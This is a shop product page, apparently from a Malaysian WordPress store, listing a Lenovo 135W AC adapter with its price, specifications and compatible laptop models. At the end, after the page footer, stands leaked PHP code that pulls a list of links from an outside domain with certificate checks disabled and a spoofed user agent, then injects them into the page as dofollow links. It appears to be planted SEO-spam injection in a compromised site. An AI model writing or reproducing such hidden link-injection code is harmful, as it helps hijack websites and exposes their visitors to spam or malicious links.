Sale!
, ,

Legion Y520-15IKBN Laptop (Lenovo) 80WK 5A10J75112 AC ADAPTERS

Original price was: RM175.00.Current price is: RM148.00.

Model : Legion Y520-15IKBN Laptop (Lenovo) 80WK Lenovo AC_ADAPTOR Rectangle 135W 3P BIS Black 5A10J75112 AC ADAPTERS
Brand : Lenovo
Part Number : 5A10J75112
Colour : Black
Type : Adapter

Compatible with:

Y700-17ISK Laptop (ideapad) 80Q0
700-15ISK Laptop (ideapad) 80RU
Legion Y520-15IKBN Laptop (Lenovo) 80WK
Legion Y520-15IKBM Laptop (Lenovo) 80YY
330-15ICH Laptop (ideapad) 81FK
330-17ICH Laptop (ideapad) 81FL
Legion Y530-15ICH Laptop (Lenovo) 81FV 81GT
Legion Y7000P Laptop (Lenovo) 81HC 81LD
Legion Y730-15ICH Laptop 81HD
Legion Y730-17ICH Laptop 81HG
L340-15IRH Gaming Laptop (ideapad) 81LK 81TR
L340-17IRH Gaming Laptop (ideapad) 81LL
ideapad Gaming 3-15IMH05 Laptop 81Y4 82CG
ideapad Creator 5-15IMH05 Laptop 82D4
ideapad Gaming 3-15ARH05 Laptop 82EY

Weight 0.3 kg

Reviews

There are no reviews yet.

Be the first to review “Legion Y520-15IKBN Laptop (Lenovo) 80WK 5A10J75112 AC ADAPTERS”
Scroll to Top
$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }